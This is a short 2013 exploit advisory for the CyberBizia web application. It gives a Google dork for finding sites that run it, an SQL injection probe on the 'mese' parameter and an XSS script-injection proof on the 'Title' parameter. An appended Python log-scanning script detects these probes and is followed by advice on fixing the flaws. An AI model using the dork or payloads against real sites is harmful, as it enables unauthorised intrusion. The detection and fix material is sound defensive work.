#********************************************************************************
# Exploit Title : CyberBizia Multiple Vulnerabilities
#
# Software link : http://www.cyberbizia.com
#
# Exploit Author : Ashiyane Digital Security Team
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:"Powered by CyberBizia"
#
# Date: 2013/08/29
#
--------------------------------------------------------------------
# Exploit 1 : SQL Injection
#
# Location : [Target]/myasg/os.asp?elenca=mese&mese=[Sql Injection]
#
#
# Proof:
#
# [Target]/myasg/os.asp?elenca=mese&mese=1'
--------------------------------------------------------------------
# Exploit 2 : Cross-Site Scripting (XSS)
#
# Location : [Target]/?Title=[xss]
#
#
# Proof:
#
# [Target]/?Title="/><script>alert(1);</script>
#
######################
discovered by : ACC3SS
######################
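
Added example, not part of the original advisory: a log triage check a site operator can run to find requests that probe the two parameters reported above (`mese` on `/myasg/os.asp` and `Title` on any page). The request lines are constructed samples, and the rule that `mese` holds a month number from 1 to 12 is an assumption based on the parameter name.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request lines ("METHOD URL"); not taken from real logs.
SAMPLE_REQUESTS = [
    "GET /myasg/os.asp?elenca=mese&mese=7",
    "GET /myasg/os.asp?elenca=mese&mese=1'",
    "GET /myasg/os.asp?elenca=mese&mese=1%27",
    "GET /?Title=Contatti",
    "GET /?Title=%22/%3E%3Cscript%3Ealert(1);%3C/script%3E",
    "GET /news.asp?id=3",
]

# Assumption: a legitimate "mese" value is a month number 1-12.
MONTH = re.compile(r"(?:0?[1-9]|1[0-2])")
# Characters that let a value break out of an HTML attribute or tag.
MARKUP = re.compile(r'[<>"]')


def classify(request_line):
    """Return the findings for one 'METHOD URL' request line."""
    _, _, target = request_line.partition(" ")
    url = urlsplit(target)
    # parse_qs percent-decodes values; ASP treats parameter names
    # case-insensitively, so names are lowercased before lookup.
    raw = parse_qs(url.query, keep_blank_values=True)
    params = {name.lower(): values for name, values in raw.items()}
    findings = []
    if url.path.lower().endswith("/myasg/os.asp"):
        if any(not MONTH.fullmatch(v) for v in params.get("mese", [])):
            findings.append("sqli-probe:mese")
    if any(MARKUP.search(v) for v in params.get("title", [])):
        findings.append("xss-probe:Title")
    return findings


def scan(lines):
    """Map each suspicious request line to its findings."""
    results = {}
    for line in lines:
        findings = classify(line)
        if findings:
            results[line] = findings
    return results


if __name__ == "__main__":
    for line, findings in scan(SAMPLE_REQUESTS).items():
        print(", ".join(findings), "<-", line)
```

Hits show probing only. The fix belongs in the application: bind `mese` as a typed query parameter and HTML-encode `Title` before it is written to the page.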